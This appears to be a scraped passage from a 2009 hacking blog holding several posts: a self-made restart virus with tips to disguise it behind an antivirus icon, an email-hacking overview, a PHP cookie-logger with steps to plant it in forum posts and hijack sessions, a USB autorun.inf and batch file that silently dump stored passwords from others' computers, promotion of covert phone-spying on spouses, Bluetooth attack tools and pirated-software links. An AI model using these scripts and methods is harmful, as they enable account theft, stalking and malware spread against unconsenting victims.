3.You will find a file by name <strong>sysres.exe</strong>, delete it.<br />
4.Type <strong>regedit </strong>in <strong>run</strong>.You will goto registry editor.Here navigate to<br />
<h3><span style="font-size: 85%;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run</span></h3>There, on the right site you will see an entry by name “<strong>sres</strong>“.Delete this entry.That’s it.You have removed this Virus successfully.<br />
<strong><span style="color: #993300;">Logic Behind The Working Of The Virus</span></strong><br />
<strong></strong><br />
If I don’t explain the logic(<strong>Algorithm</strong>) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.<strong>If you have further doubts please pass comments.</strong><br />
<strong>LOGIC:</strong><br />
1. First the virus will find the Root partition (Partition on which Windows is installed).<br />
2. Next it will determine whether the Virus file is already copied(Already infected) into <strong>X:\Windows\System</strong><br />
3. If not it will just place a copy of itself into <strong>X:\Windows\System</strong> and makes a registry entry to put this virus file onto the startup.<br />
4. Or else if the virus is already found in the <strong>X:\Windows\System</strong> directory(folder), then it just gives a command to <strong>restart</strong> the computer.<br />
This process is repeated every time the PC is restarted.<br />
<strong>NOTE: </strong>The system will not be restarted as soon as you double click the <strong>Sysres.exe</strong> file.The restarting process will occur from the next boot of the system.<br />
<span style="color: #993300;"><strong><span style="font-size: 130%;"><span style="font-size: large;">AND ONE MORE THING BEFORE YOU LEAVE</span></span></strong>(This Step is optional)</span><br />
After you compile, the <strong>Sysres.exe</strong> file that you get will have a <strong>default icon</strong>.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this <strong>Sysres.exe</strong> file into any other ICON that is more trusted and looks attractive.<br />
For example you can change the <strong>.exe</strong> file’s icon into <strong>Norton antivirus</strong> ICON itself so that the people seeing this file beleives that it is <strong>Norton antivirus</strong>. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.<br />
The detailed tutorial on changing the ICON is given in my post <a href="http://hackuniversal.blogspot.com/2009/09/how-to-change-icon-of-exe-file.html" style="font-weight: bold;"><strong><span style="color: #005500;">How To Change The ICON Of An EXE File</span></strong></a><a href="http://hackuniversal.blogspot.com/2009/09/how-to-change-icon-of-exe-file.html"><span style="font-weight: bold;"> .</span></a>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-36270587129765817552009-09-14T01:17:00.003+07:002009-09-14T01:17:36.878+07:00How to Change the ICON of an EXE file<div class="entrytitle"><a href="" name="7726020905338421337"></a><span class="meta"> </span></div><a href="http://www.gohacking.com/wp-content/uploads/2008/12/changing-icon1.jpg"><img alt="" class="alignleft size-thumbnail wp-image-203" height="150" src="http://1.1.1.5/bmi/www.gohacking.com/wp-content/uploads/2008/12/changing-icon1-150x150.jpg" title="changing-icon1" width="150" /></a><br />
Some times it becomes necessary to change the ICON of an executable(.exe) file so that the exe file get’s a new appearence.Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user.But in reality when the file is carried to a different computer, then it shows it’s original ICON itself.This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself.Now when this is done the exe file’s ICON is changed permanantly so that even if you take file to a different computer it show’s a new icon.<br />
For this purpose I have found a nice tool which modifies the exe file and will embed the ICON of your choice into the file itself. <strong>ie</strong>:The tool changes the exe ICON permanantly.<br />
I’ll give you a step-by-step instruction on how to use this tool to change the icon.<br />
1. Goto <a href="http://www.shelllabs.com/" rel="nofollow" target="_balnk"><strong><span style="color: #005500;">www.shelllabs.com</span></strong></a> and download the trial version of <strong>Icon Changer </strong>and install it (Works on both XP and Vista).<br />
2. <strong>Right-click</strong> on the <strong>exe file</strong> whose ICON is to be changed.<br />
3. Now you will see the option <strong>Change Icon…</strong>Click on that option.<br />
4. Now the <strong>Icon Changer</strong> program will open up.<br />
5. Icon changer will search for all the ICONS on your system so that you can select any one of those.<br />
6. Now select the ICON of your choice and click on <strong>SET</strong>.<br />
7. Now a popup window will appear and ask you to select from either of these two options.<br />
<ul><li>Change embeded icon.</li>
<li>Adjust Windows to display custom icon.</li>
</ul>Select the first option (Change embeded icon).<br />
8. You are done.The ICON get’s changed.Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-72569577013078893572009-09-14T01:07:00.005+07:002009-09-14T01:07:23.910+07:00email hacking 1<span><br />
</span><span></span><br />
<div class="entry clearfloat"><img alt="" class="alignleft" height="131" src="http://1.1.1.5/bmi/mrcracker.com/wp-content/uploads/2009/01/mail.jpg" title="Email Hacking" width="131" />I constantly get emails of people asking me how to hack hotmail, hack yahoo, and all the other popular email services. Usually it’s for one of the following moronic cover-ups: It’s my password, I just forgot it. , or my boyfriend this or my girlfriend that. I just don’t understand what possesses them to possibly think that I give a hoot. Nah, I love you guys, I’m just kidding! Everyone seems to think that there’s some hacking trick that will magically get them the password. Too bad you have to actually learn something. Bummer… eh? Below I have briefly described the most common methods.<br />
<br />
<strong><a href="http://mrcracker.com/2009/01/what-is-phishing/">Phishing</a> -</strong> Phishing is by far the most used and easiest method. The attacker simply sets up a page that looks exactly like the real email login page and tricks people into entering their login information.<br />
<strong>Update:</strong> Check out the new post on how to create your own phishing page <a href="http://mrcracker.com/2009/02/fake-login-page/">here</a>.<br />
<br />
<strong>Malware -</strong> Attackers can infect computers with malware such as Trojan horses that could extract all the saved passwords on a computer or a key logger that will log all the victims typed passwords.<br />
<br />
<strong>Guessing -</strong> The attacker could literally guess the password if the victim uses an easy password like his/her name, birthday, favorite something, pets name, or something similar. If the attacker knows the victim well enough this attack won’t be that difficult to carry out.<br />
<br />
<strong>Social Engineering -</strong> The attacker could literally ask for your password by calling up the victim and pretending to be an IT employee of the company. Once the victims trust is gained, the attacker would then make up a story saying something like the victims password is needed to do some updates because the user database is down or some other bogus. The attacker could also use social engineering along with a phishing page. This would be done by sending the victim a n email that looks like it is from the real email provider. In the email would be a link to his phishing page telling the victim that he/she needs to login and update or change some information immediately for whatever reason.</div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-13718865637885177272009-09-14T00:00:00.002+07:002009-09-14T00:00:58.394+07:00Create a CookieLogger and Hack any Account::<div class="post uncustomized-post-template"><div class="post-body"> <img alt="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLxSdWpcFwvXPK4ldEH63imDfkxdisTEahjI_S6V-VyEDcUP3uunQ1qUC_zhHe0jcrlxOVJLR6AuEcSzonBFTD5GPYJqtKCEKZ8lmSGcdwX3e2TBkh-_cu5X2BA0t5uNBghTxxKCbkAU8/s400/how+to+hack+proof+email+account+password+msn+yahoo+email+hacking.jpg" src="http://1.1.1.1/bmi/1.bp.blogspot.com/_S3XEraQZjGk/SNSgGnrMD3I/AAAAAAAACM0/pCSXhR37kP4/s400/how+to+hack+proof+email+account+password+msn+yahoo+email+hacking.jpg" /><br />
<br />
Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.<br />
<strong>What is a CookieLogger?</strong><br />
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.<br />
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …<br />
<strong>Step 1: </strong>Save the notepad file from the link below and Rename it as Fun.gif:<br />
<blockquote><a href="http://w18.easy-share.com/1702516956.html" target="_blank" title="Script1">Download it.</a></blockquote><strong>Step 2: </strong>Copy the Following Script into a Notepad File and Save the file as cookielogger.php:<br />
<blockquote>$filename = “logfile.txt”;<br />
if (isset($_GET["cookie"]))<br />
{<br />
if (!$handle = fopen($filename, ‘a’))<br />
{<br />
echo “Temporary Server Error,Sorry for the inconvenience.”;<br />
exit;<br />
}<br />
else<br />
{<br />
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)<br />
{<br />
echo “Temporary Server Error,Sorry for the inconvenience.”;<br />
exit;<br />
}<br />
}<br />
echo “Temporary Server Error,Sorry for the inconvenience.”;<br />
fclose($handle);<br />
exit;<br />
}<br />
echo “Temporary Server Error,Sorry for the inconvenience.”;<br />
exit;<br />
?></blockquote><strong>Step 3: </strong>Create a new Notepad File and Save it as logfile.txt<br />
<strong>Step 4:</strong> Upload this file to your server<br />
cookielogger.php -> http://www.yoursite.com/cookielogger.php<br />
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)<br />
fun.gif -> http://www.yoursite.com/fun.gif<br />
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :<br />
<blockquote>http://0fees.net</blockquote><strong>Step 5: </strong>Go to the victim forum and insert this code in the signature or a post :<br />
<blockquote><span style="font-size: 130%;"><a href="http://w14.easy-share.com/1702516964.html" target="_blank" title="Script2">Download it.</a></span></blockquote><strong>Step 6: </strong>When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:<br />
<blockquote>phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9</blockquote><strong>Step 7:</strong> To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.<br />
<strong>Step 8: </strong>Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.<br />
<strong>Note : </strong>Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.<br />
<strong>Disclaimer: </strong>I don’t take Responsibility for what you do with this script, served for Educational purpose only. <strong>…</strong><br />
*******************************END*********************************** </div></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-8148920207460956252009-09-13T23:53:00.003+07:002009-09-13T23:53:30.354+07:00How to hack passwords using USB Drive:<div class="post uncustomized-post-template"> <a href="" name="3564785770947236095"></a> <h3 class="post-title"> <a href="http://hackinggod.blogspot.com/2009/09/how-to-hack-passwords-using-usb-drive.html"><br />
</a> </h3><div class="post-body"> MessenPass:<br />
Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.<br />
<br />
b]Mail PassView:<br />
Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.<br />
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.<br />
<br />
IE Passview:<br />
<br />
IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0<br />
<br />
Protected Storage PassView:<br />
Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…<br />
<br />
PasswordFox:<br />
<br />
PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.<br />
<br />
<h3 class="smller">Download tool kits frm here...</h3><div><a href="http://lh4.ggpht.com/_C7wvfnH8ijQ/SWxf6BVDrcI/AAAAAAAAANE/NUFHNwbGuLE/Documents.gif" target="_blank"><img alt="" src="http://1.1.1.5/bmi/lh4.ggpht.com/_C7wvfnH8ijQ/SWxf6BVDrcI/AAAAAAAAANE/NUFHNwbGuLE/Documents.gif" /></a></div><br />
<br />
<br />
MessenPass: <a href="javascript:void(0);" onclick="_linkInterstitial('http://www.nirsoft.net/utils/mspass.html'); return false;" target="_blank">http://www.nirsoft.net/utils/mspass.html</a><br />
<br />
<div class="para"><wbr></wbr>Mail Passview: <a href="javascript:void(0);" onclick="_linkInterstitial('http://www.nirsoft.net/utils/mailpv.html'); return false;" target="_blank">http://www.nirsoft.net/utils/mailpv.html</a><br />
<br />
<wbr></wbr>IE Passview: <a href="javascript:void(0);" onclick="_linkInterstitial('http://www.nirsoft.net/utils/internet_ex\74wbr\76...sword.html'); return false;" target="_blank">http://www.nirsoft.net/utils/internet_ex<wbr></wbr>...sword.html</a><br />
<br />
Protected Storage PassView: <a href="javascript:void(0);" onclick="_linkInterstitial('http://www.nirsoft.net/utils/pspv.html'); return false;" target="_blank">http://www.nirsoft.net/utils/pspv.html</a><br />
<br />
Pa<wbr></wbr>sswordFox: <a href="javascript:void(0);" onclick="_linkInterstitial('http://www.nirsoft.net/utils/passwordfox\74wbr\76.html'); return false;" target="_blank">http://www.nirsoft.net/utils/passwordfox<wbr></wbr>.html</a><br />
<br />
<b>Steps<br />
NOTE: You must temporarily disable your antivirus before following these </b><br />
<br />
steps.1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.<br />
<br />
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.<br />
<br />
2. Create a new Notepad and write the following text into it:<br />
<br />
[autorun]<br />
open=launch.bat<br />
ACTION= Perform a Virus Scan<br />
<br />
save the Notepad and rename it from<br />
<br />
New Text Document.txt to autorun.inf<br />
<br />
Now copy theautorun.inf file onto your USB pendrive.<br />
<br />
3. Create another Notepad and write the following text onto it:<br />
<br />
start mspass.exe /stext mspass.txt<br />
<br />
start mailpv.exe /stext mailpv.txt<br />
<br />
start iepv.exe /stext iepv.txt<br />
<br />
start pspv.exe /stext pspv.txt<br />
<br />
start passwordfox.exe /stext passwordfox.txt<br />
<br />
<br />
save the Notepad and rename it from<br />
<br />
New Text Document.txt to launch.bat<br />
<br />
Copy the launch.bat file also to your USB drive.<br />
<br />
Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps<br />
<br />
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).<br />
<br />
2. In the pop-up window, select the first option (Perform a Virus Scan).<br />
<br />
3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.<br />
<br />
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.<br />
<br />
This hack works on Windows 2000, XP,Vista and 7<br />
<br />
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.<br />
<br />
*******************************END***********************************</div></div></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-43392073374278372422009-09-13T23:38:00.000+07:002009-09-13T23:38:06.814+07:00Cell Phone Spy<div class="post uncustomized-post-template"> <a href="" name="8807586131097078520"></a> <h3 class="post-title"> <a href="http://hackinggod.blogspot.com/2009/08/cell-phone-spy-how-to-spy-on-cell-phone.html">– How to Spy on a Cell Phone<br />
</a> </h3><div class="post-body"> <img alt="" src="file:///C:/DOCUME%7E1/wckjck/LOCALS%7E1/Temp/moz-screenshot.png" /><br />
<div style="text-align: center;"> </div><img alt="Cell Phone Spy" class="alignleft size-full wp-image-1520" height="153" src="http://1.1.1.4/bmi/www.gohacking.com/wp-content/uploads/2009/06/Mobile-Spy.jpg" title="Cell Phone Spy" width="125" />Are you curious to know <strong>how to spy on a cell phone?</strong> Do you want to secretly spy on SMS text messages, calls, GPS locations and other confidential info of your child’s or spouse’s cell phone? Well here is a detailed tutorial on how to spy on cell phones.<br />
Every day I get a lot of emails from people asking how to spy on cell phone. Before you can spy on a cell phone you need to know the following facts.<br />
1. To spy on a given cell phone you should make sure that the target cell phone is compatible with the <strong>cell phone spy</strong> software.<br />
2. Cell phone <a href="http://en.wikipedia.org/wiki/Spyware" target="_blank">spy softwares</a> are compatible with the following type of phones (operating systems).<br />
<strong>1. Symbian OS (Most Nokia Phones)</strong><br />
<strong>2. Apple iphone</strong><br />
<strong>3. Windows Mobile</strong><br />
For a complete list of compatible cell phones visit the Mobile Spy site and click on <strong>Compatiblity</strong> link present on the left hand sidebar. <br />
Today most of the modern cell phones are loaded with one of the above three operating systems and hence compatibility doesn’t pose a major problem. There exists many cell phone spy softwares on the market to accomplish this job and hence people often get confused about which cell phone spy software to go for. To make this job simpler for you we personally tested some of the top cell phone spy softwares and based on the results we conclude that the following cell phone spy software to be the best one.<br />
<h3>Mobile Spy - The No.1 Cell Phone Spy Software</h3><em>Mobile Spy is a perfect tool for parents to monitor their childern’s activity on thier cell phone!</em><br />
<strong>Mobile Spy Features</strong><br />
Mobile Spy is a hybrid spy software/service which allows you to spy on your target cell phone in real time. This unique system records the activities of anyone who uses the compatible cell phone ( iPhone, Windows Mobile or Symbian OS smartphone). For this you need to install a small application onto the cell phone. This application starts at every boot of the phone but remains stealth and does not show up in the running process list. It runs in the background and will spy on every activity that takes place on the phone.<br />
<strong>Logging Features</strong><br />
1. Calls Log – Each incoming and outgoing number on the phone is logged along with duration and time stamp.<br />
2. Every text message/MMS is logged even if the phone’s logs are deleted. Includes full text.<br />
3. The phones’s current location is frequently logged using GPS when signal is available.<br />
4. Each address entered into Internet Explorer (or any browser) is logged.<br />
5. This cell phone spy software works in total stealth mode. The person using the phone can never come to know about the presence of this software.<br />
<strong>How it works</strong><br />
The working of Mobile Spy is very simple and needs no extra knowledge to install and use.<br />
Step 1- After you purchase Mobile Spy you’ll get a link to download the software. Along with this you’ll get a username and password for you online control panel.<br />
Step 2- Install the downloaded cell phone spy software onto any of the compatible cell phone. After installation the software starts recording all the activities on the cell phone.<br />
Step 3- Login to your online control panel to see the logs containing the recorded information.<br />
This is just a small list of it’s features. For a list of compatible phones, step-by-step installation guide and more details visit the following link<br />
<h3>Mobile Spy</h3><br />
<strong>Why Mobile Spy?</strong><br />
Mobile Spy is one of the best and award winning cell phone spy softwares on the market with an affordable price. Mobile Spy team provides an excellent support and hence it becomes just a cakewalk to spy on your favorite cell phone! Today with an excessive usage of cell phones by many teenagers it becomes necessary for their parents to perform cell phone spying. So what are you waiting for? Go grab Mobile Spy and expose the truth.<br />
<br />
*******************************END*********************************** </div></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-75838907586982023062009-09-13T23:33:00.000+07:002009-09-13T23:33:52.168+07:00BLUETOOTH MOBILE HACKING<div class="post uncustomized-post-template"> <a href="" name="5858339245678143709"></a> <div class="post-body"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRDir1YFrs69WyjinPfCk8CrTDmOYqQ18wtLfpu4M4JrGwcXlLTm_4r_rQilGSo7zfGrBbktUr6THgCObd89U5mu3m4F1PBMiQ_ha0XGBeSo14Z9vSy5ggMyBh0-bC8CPismpQ4KhSJL5A/s1600-h/mobile-hacking.jpg" style="color: white;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5368401613928047186" src="http://1.1.1.5/bmi/2.bp.blogspot.com/_ZVOfm58__i8/SoBk0ynQolI/AAAAAAAAAGQ/dQSXKNWPiDk/s320/mobile-hacking.jpg" style="display: block; height: 310px; margin: 0px auto 10px; text-align: center; width: 320px;" /></a><br />
<div style="color: white;"><strong></strong></div>Bluetooth technology is great, No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users (remember Paris Hilton?). If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them. This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices. Discovering Bluetooth Devices BlueScanner - BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device. BlueSniff - BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices. BTBrowser - Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 - the Java Bluetooth specification. BTCrawler -BTCrawler is a scanner for Windows based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks. Hacking Bluetooth Devices BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information. CIHWB - Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack. Bluediving - Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode. Transient Bluetooth Environment Auditor - T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools. Bluesnarfer - Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data. BTcrack - BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges. Blooover II - Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. BlueTest - BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices. BTAudit - BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. UPDATE: Hey folks, due to massive response the download links to above Mobile Hacking Premium Pack were moved to our must-have downloads page which is only available to MakeUseOf subscribers. So you will need to subscribe before youcan get them. For the Subscribers : To get your free Mobile Hacking Premium just write comment with your email address that you have used to subscribe and the above Premium Pack will be mailed to you. You need to be a subscriber to get the premium pack. Before Sending the Premium Pack we will be checking for your Authenticity. You will Receive your Premium Pack within 24 hours. What’s next? Let everyone know to disable Bluetooth until they really need it. Additionally, make sure to update your phone software on a regular basis.<br />
<div><strong><a href="http://www.getjar.com/products/28560/KioraBlueJack"><span style="font-size: 180%;"><br />
DOWNLOAD 1</span></a><br />
<br />
<a href="http://www.getjar.com/products/15782/MagicBlueHack"><span style="font-size: 180%;">DOWNLOAD 2</span></a></strong></div></div></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-47605542776995880622009-09-13T23:20:00.003+07:002009-09-13T23:26:35.699+07:00WinRAR Password Remover 2.0<div class="post uncustomized-post-template"><a href="http://www.blogger.com/post-edit.g?blogID=8831931331327422057&postID=4760554277699588062" name="4824415886577299814"></a> <br />
<h3 class="post-title"><a href="http://hackinggod.blogspot.com/2009/09/winrar-password-remover-20.html"><br />
</a> </h3><div class="post-body"><div style="font-family: arial; text-align: center;"><span style="font-size: 130%;">WinRAR Password Remover 2.0<br />
</span></div><br />
<br />
<a href="http://hackinggod.blogspot.com/"><img alt="" border="0" onload="NcodeImageResizer.createOn(this);" src="http://1.1.1.2/bmi/www.agrasoft.com/rpre/progress.png" /></a><br />
<br />
Advanced RAR Password Recovery is an application that helps you to recover forgotten passwords for RAR/WinRAR files. We’ve all had the experience of not using a file for a while and then forgetting the password. This problem is solved with Advanced RAR Password Recovery. With it you don’t need to keep a record of your passwords; if you forget one, you just operate the program and find.<br />
<br />
<div style="color: black; font-family: arial; text-align: center;"><span style="font-size: 100%;"><img alt="Download" border="0" src="http://1.1.1.5/bmi/i296.photobucket.com/albums/mm173/download_image/download.gif" /></span><span style="font-size: 100%;"></span><br />
<span style="font-size: 100%;"></span><span style="font-size: 100%;">▼</span><span style="font-size: 100%;"></span><br />
<span style="font-size: 100%;"></span><span style="font-size: 100%;">▼</span><span style="font-size: 100%;"></span><br />
<span style="font-size: 100%;"></span><span style="font-size: 100%;">▼</span></div><div style="color: black; font-family: arial; font-weight: bold; text-align: center;"><span style="font-size: 100%;"></span></div><a href="http://uploading.com/files/Y7VNGA9L/Rar_password_Remover_Priv8.rar.html">http://uploading.com/files/Y7VNGA9L/Rar_password_Remover_Priv8.rar.html</a><br />
<br />
<span style="font-weight: bold;">OR</span><br />
<div style="color: black; font-family: arial; font-weight: bold; text-align: center;"><span style="font-size: 100%;"></span></div><a href="http://hotfile.com/dl/8797510/3a1d99c/Rar_password_Remover_by_onel0ve.rar.html"><span style="font-size: 100%;"><span style="font-weight: bold;">http://hotfile.com/dl/8797510/3a1d99c/Rar_password_Remover_by_onel0ve.rar.html</span></span></a></div></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-608688926712093602009-09-13T23:04:00.000+07:002009-09-13T23:04:35.149+07:00Amazing Internet Speed Booster (100% works)<div class="post uncustomized-post-template"><div class="post-body"> <span style="font-family: arial;">Dramatically speed up your existing Internet broadband connection and get the best performance possible from your current Internet access. No technical questions; just one click and it’s done. Free Internet speed test software included.. Full Speed will increase your online Internet speed with everything you do: faster downloads, web browsing, data streaming, e-mail. P2P and gaming.</span><br />
<br />
<a href="http://hackinggod.blogspot.com/"><img alt="" border="0" onload="NcodeImageResizer.createOn(this);" src="http://1.1.1.5/bmi/i286.photobucket.com/albums/ll98/WebSociety/t9k0xvqks6d2moxkjjjt.jpg" style="font-family: arial;" /></a><br />
<br />
<span style="font-family: arial;"> Features:</span><br />
<br />
<span style="font-family: arial;"> * Faster Internet access</span><br />
<span style="font-family: arial;"> * Faster download speeds</span><br />
<span style="font-family: arial;"> * Faster web site browsing performance</span><br />
<span style="font-family: arial;"> * Improve Internet and Intranet performance</span><br />
<span style="font-family: arial;"> * Quicker data download times</span><br />
<span style="font-family: arial;"> * Improved streaming music and movies</span><br />
<span style="font-family: arial;"> * Faster download for songs and video</span><br />
<span style="font-family: arial;"> * Faster performance with email</span><br />
<span style="font-family: arial;"> * Better download speed for all data</span><br />
<span style="font-family: arial;"> * Faster loading Web graphics</span><br />
<span style="font-family: arial;"> * Speed test for Web site browsing</span><br />
<span style="font-family: arial;"> * Speed test for general data transfer</span><br />
<br />
<span style="font-family: arial;"> Tested over:</span><br />
<span style="font-family: arial;"> 1. T1, T3, Cable, DSL - SDSL, ADSL</span><br />
<span style="font-family: arial;"> 2. VPN and direct wired WAN/LAN</span><br />
<span style="font-family: arial;"> 3. P2P, Remote Desktop, File Sharing Software<br />
<br />
</span><br />
<div style="color: black; font-family: arial; text-align: center;"><span style="font-size: 100%;"><img alt="Download" border="0" src="http://1.1.1.5/bmi/i296.photobucket.com/albums/mm173/download_image/download.gif" /></span><span style="font-size: 100%;"></span><br />
<span style="font-size: 100%;"></span><span style="font-size: 100%;">▼</span><span style="font-size: 100%;"></span><br />
<span style="font-size: 100%;"></span><span style="font-size: 100%;">▼</span><span style="font-size: 100%;"></span><br />
<span style="font-size: 100%;"></span><span style="font-size: 100%;">▼</span></div><a href="http://rapidshare.com/files/255235160/Full_Speed_Internet_Broadband_Connection_v3.rar"><span style="font-size: 100%;"><span style="font-weight: bold;">http://rapidshare.com/files/255235160/Full_Speed_Internet_Broadband_Connection_v3.rar</span></span></a></div></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-45116599846093983142009-09-09T23:59:00.000+07:002009-09-09T23:59:04.456+07:00GOOGLE HACK<div style="text-align: center;">dapatkan semua games, music, program, antivirus, dll secara gratis dan mudah</div><div style="text-align: center;">dengan google hack</div><div style="text-align: center;"></div><div style="text-align: center;"></div><div style="text-align: center;"><span style="background-color: #ffd966; color: red; font-family: Verdana,sans-serif; font-size: x-large;"><a href="http://www.ziddu.com/download/6392810/GoogleHacks.exe.html">DOWNLOAD</a></span></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-64232686244464264052009-09-09T23:53:00.000+07:002009-09-09T23:53:27.697+07:00Top 5 Ways to get Free One Way Backlinks to your site<div class="post-body"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlU0h-9MZO6QIkOWrR7C4Jg5nLJlKgrc7kLitH_hMzNl4D5QWx1GMx_0EF7jm5Y9gdrQwv5-D6LktNw9GQilUXBlp8hE2-mUfa0zQeYYdqqix8gyn1laQKHdmXzOUwmmO4JFKBPlVU89Pu/s1600-h/backlink.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="How to get Free One Way backlinks to your site" border="0" id="BLOGGER_PHOTO_ID_5296013053562261266" src="http://1.1.1.1/bmi/3.bp.blogspot.com/_Toi-rh0Nm00/SX830A9pDxI/AAAAAAAACtM/mQVpQyMxKZE/s320/backlink.jpg" style="cursor: pointer; float: left; height: 238px; margin: 